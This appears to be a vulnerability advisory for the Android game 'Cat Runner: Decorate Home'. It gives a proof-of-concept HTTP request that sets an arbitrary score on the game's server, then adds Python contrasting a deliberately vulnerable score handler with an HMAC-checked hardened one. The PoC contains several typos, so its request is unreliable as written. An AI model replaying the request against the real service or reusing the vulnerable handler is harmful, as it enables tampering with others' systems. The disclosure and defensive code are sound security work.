# Cat Runner: Decorate Home - External Control of Assumed-Immutable Web Parameter
# Date: Jan 17, 2019
# Software Link: https://play.google.com/store/apps/details?id=com.solou.catendless.run&hl=en
# Version: 2.8.0 Android App
# Vendor: Ivy
# Exploit Author: Loc Phan Van
# Category: Mobile Apps
# Tested on: Android 8.1

# Description
# The application API does not sufficiently verify inputs that are assumed to be immutable but are actually
# externally controllable. An attacker can manipulate the parameters exchanged between client and server in
# order to modify application data and gain benefits for their own account. In this case, a user's score
# parameter can be changed externally.

# PoC

Request:

Post //index/commit HTTP/1.1
Content-type: application/x-www-form-urlencoded
X-Unity-Version: 5.6.4f1
User-agent: Dalvik/2.1.0 (Linuxl; U; Android 5.1.1; SN-G920V Build/LVY47X)
Host: card.matchJplay.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 89

uid=1aef329eb95be620abfa417d20112b2e&appid=2419&tag=Highschore&score=151414141&week201903

Response:

HTTP/1.1 200 OK
Server: nginx/1.14.0
Date: Thu, 17 Jan 2019 03:49:55 GMT
Content-type: text/hmlt, charset-UTF-8
Connection: close
X-Powered-By: PHP/7.2.6
Content-Length: 28

{"status":1 ,"msg" : "success"}

References:
https://www.youtube.com/watch?v=u5iEeLZnYVg
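The root cause above is a server that stores whatever `score` value the client sends. The following Python is an added illustration, not code from the app or its vendor: it contrasts a handler that trusts the form body as-is with one that (a) validates field presence and type, (b) requires an HMAC over the score fields computed with a key that only the server holds, so a value altered in transit fails verification, and (c) rejects scores above a plausibility ceiling. The field names follow the PoC body; the uid, secret, ceiling and `sig` field are constructed for the example. The signature only helps when the server, not the client, produces the signed score (for example after a run the server has tracked), since a key shipped inside the APK can be extracted.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed settings for the example (not values from the advisory).
MAX_PLAUSIBLE_SCORE = 1_000_000            # ceiling a legitimate run can reach
SESSION_SECRET = b"server-side-demo-secret"  # held server-side only


def parse_commit_body(body: str) -> dict:
    """Parse an x-www-form-urlencoded body into single-valued fields."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def commit_score_vulnerable(body: str, db: dict) -> dict:
    """Vulnerable pattern: the client-supplied score is stored unchanged."""
    p = parse_commit_body(body)
    db[p["uid"]] = int(p["score"])
    return {"status": 1, "msg": "success"}


def sign_commit(uid: str, appid: str, tag: str, score: int, week: str,
                secret: bytes = SESSION_SECRET) -> str:
    """Server-side MAC binding the score to the user, app, board and week."""
    msg = "|".join([uid, appid, tag, str(score), week]).encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def commit_score_hardened(body: str, db: dict,
                          secret: bytes = SESSION_SECRET) -> dict:
    """Hardened pattern: validate, verify the MAC, bound the value."""
    p = parse_commit_body(body)
    required = ("uid", "appid", "tag", "score", "week", "sig")
    if any(k not in p for k in required):
        return {"status": 0, "msg": "missing field"}
    if not p["score"].isdigit():
        return {"status": 0, "msg": "bad score"}
    score = int(p["score"])

    # Any change to uid/appid/tag/score/week after signing breaks the MAC.
    expected = sign_commit(p["uid"], p["appid"], p["tag"], score, p["week"], secret)
    if not hmac.compare_digest(expected, p["sig"]):
        return {"status": 0, "msg": "bad signature"}

    # Defence in depth: an implausible value is rejected and worth alerting on.
    if score > MAX_PLAUSIBLE_SCORE:
        return {"status": 0, "msg": "implausible score"}

    # Never let a submission lower an existing high score.
    db[p["uid"]] = max(db.get(p["uid"], 0), score)
    return {"status": 1, "msg": "success"}


if __name__ == "__main__":
    db = {}
    sig = sign_commit("demo-uid", "2419", "Highscore", 5000, "201903")
    body = f"uid=demo-uid&appid=2419&tag=Highscore&score=5000&week=201903&sig={sig}"
    print(commit_score_hardened(body, db), db)
    print(commit_score_hardened(body.replace("score=5000", "score=151414141"), db))
```

In a real deployment the server would also rate-limit commits per uid and log rejected signatures, since a burst of `bad signature` responses from one account is the detection signal for exactly the tampering the PoC shows.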